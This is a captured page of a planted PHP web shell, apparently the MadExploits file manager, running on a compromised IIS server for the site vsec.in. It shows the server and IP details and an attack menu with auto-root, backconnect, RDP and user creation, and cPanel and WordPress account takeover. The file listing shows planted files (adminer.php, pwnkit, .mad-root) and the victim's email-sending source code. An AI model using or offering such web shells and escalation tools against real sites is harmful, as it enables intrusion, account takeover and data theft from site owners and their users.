Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
App_Code /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
BindCategories.cs
3.66
KB
-rw-rw-rw-
BindNews.cs
17.67
KB
-rw-rw-rw-
Class1.cs
2.74
KB
-rw-rw-rw-
DBManager_2.cs
5.21
KB
-rw-rw-rw-
DBmanager.cs
4.64
KB
-rw-rw-rw-
Dal_MediaType.cs
2.06
KB
-rw-rw-rw-
Dal_NewsSource.cs
3.04
KB
-rw-rw-rw-
Dal_PostNews.cs
17.14
KB
-rw-rw-rw-
Dal_Segment.cs
2.96
KB
-rw-rw-rw-
DataSetBill.xsd
15.47
KB
-rw-rw-rw-
DataSetBill.xss
859
B
-rw-rw-rw-
DataSetBill_Report.xsd
16.09
KB
-rw-rw-rw-
DataSetBill_Report.xss
859
B
-rw-rw-rw-
DataSetOnlyId.xsd
6.91
KB
-rw-rw-rw-
DataSetOnlyId.xss
854
B
-rw-rw-rw-
DataSetP_Pres.xsd
6.91
KB
-rw-rw-rw-
DataSetP_Pres.xss
3
B
-rw-rw-rw-
DataSetPatient.xsd
6.92
KB
-rw-rw-rw-
DataSetPatient.xss
3
B
-rw-rw-rw-
Emailsender.cs
1.15
KB
-rw-rw-rw-
GlobalClass.cs
495
B
-rw-rw-rw-
ManageSession.cs
1.24
KB
-rw-rw-rw-
PaymentData.cs
1.16
KB
-rw-rw-rw-
RishiMathod.cs
3.52
KB
-rw-rw-rw-
SMTPEmailSender.cs
1.56
KB
-rw-rw-rw-
ShowSlot.cs
413
B
-rw-rw-rw-
SmsSender.cs
1014
B
-rw-rw-rw-
Sql_Connection.cs
918
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
dbconnection.cs
1.19
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SMTPEmailSender.cs
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System; using System.Net; using System.Net.Mail; using System.Configuration; /// <summary> /// Summary description for SMTPEmailSender /// </summary> public class SMTPEmailSender { public SMTPEmailSender() { } public bool SendEmail(string[] ToEmails, string Subject, string Body) { bool Status = false; // Configure the SMTP client SmtpClient client = new SmtpClient("smtp.gmail.com", 587); client.EnableSsl = true; client.UseDefaultCredentials = false; string SMTPSender = ConfigurationManager.AppSettings["SMTPSender"].ToString(); string SMTPSenderPassword = ConfigurationManager.AppSettings["SMTPSenderPassword"].ToString(); client.Credentials = new NetworkCredential(SMTPSender, SMTPSenderPassword); // Create the email message MailMessage message = new MailMessage(); message.From = new MailAddress(SMTPSender, "VSEC"); foreach (var email in ToEmails) { if (!string.IsNullOrEmpty(email)) { message.To.Add(email); } } message.Subject = Subject; message.Body = Body; message.IsBodyHtml = true; try { // Send the email client.Send(message); Status = true; } catch (Exception ex) { Status = false; } return Status; } }
Close